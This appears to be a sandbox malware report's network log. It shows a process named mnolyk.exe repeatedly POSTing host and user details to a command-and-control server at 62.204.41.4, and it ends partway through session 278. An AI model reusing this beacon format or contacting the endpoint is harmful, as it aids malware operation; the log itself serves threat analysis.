                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      261 | 192.168.2.7 | 49956 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:11.390676975 CET | 376 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:11.454973936 CET | 376 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      262 | 192.168.2.7 | 49957 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:11.632559061 CET | 377 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:11.696100950 CET | 377 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      263 | 192.168.2.7 | 49958 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:11.883806944 CET | 378 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:11.950310946 CET | 378 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      264 | 192.168.2.7 | 49959 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:12.184454918 CET | 379 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:12.247689962 CET | 379 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      265 | 192.168.2.7 | 49960 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:12.428216934 CET | 380 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:12.492048979 CET | 380 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      266 | 192.168.2.7 | 49961 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:12.685374975 CET | 381 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:12.749408007 CET | 381 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      267 | 192.168.2.7 | 49962 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:12.926371098 CET | 382 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:12.989113092 CET | 382 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      268 | 192.168.2.7 | 49963 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:13.161472082 CET | 383 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:13.224231958 CET | 383 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      269 | 192.168.2.7 | 49964 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:13.400471926 CET | 384 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:13.463514090 CET | 384 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      27 | 192.168.2.7 | 49721 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:08.117511988 CET | 131 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:08.181422949 CET | 131 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      270 | 192.168.2.7 | 49965 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:13.650115967 CET | 385 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:13.712537050 CET | 385 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      271 | 192.168.2.7 | 49966 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:13.888623953 CET | 386 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:13.951494932 CET | 386 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      272 | 192.168.2.7 | 49967 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:14.132869005 CET | 387 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:14.195507050 CET | 387 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      273 | 192.168.2.7 | 49968 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:14.393779039 CET | 388 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:14.456599951 CET | 388 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      274 | 192.168.2.7 | 49969 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:14.885714054 CET | 389 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:14.949523926 CET | 389 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      275 | 192.168.2.7 | 49970 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:15.189928055 CET | 390 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:15.255315065 CET | 390 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      276 | 192.168.2.7 | 49971 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:15.502675056 CET | 391 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:15.565202951 CET | 391 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      277 | 192.168.2.7 | 49972 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:16.388087034 CET | 392 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:16.450793028 CET | 392 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      278 | 192.168.2.7 | 49973 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:16.792891026 CET | 393 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
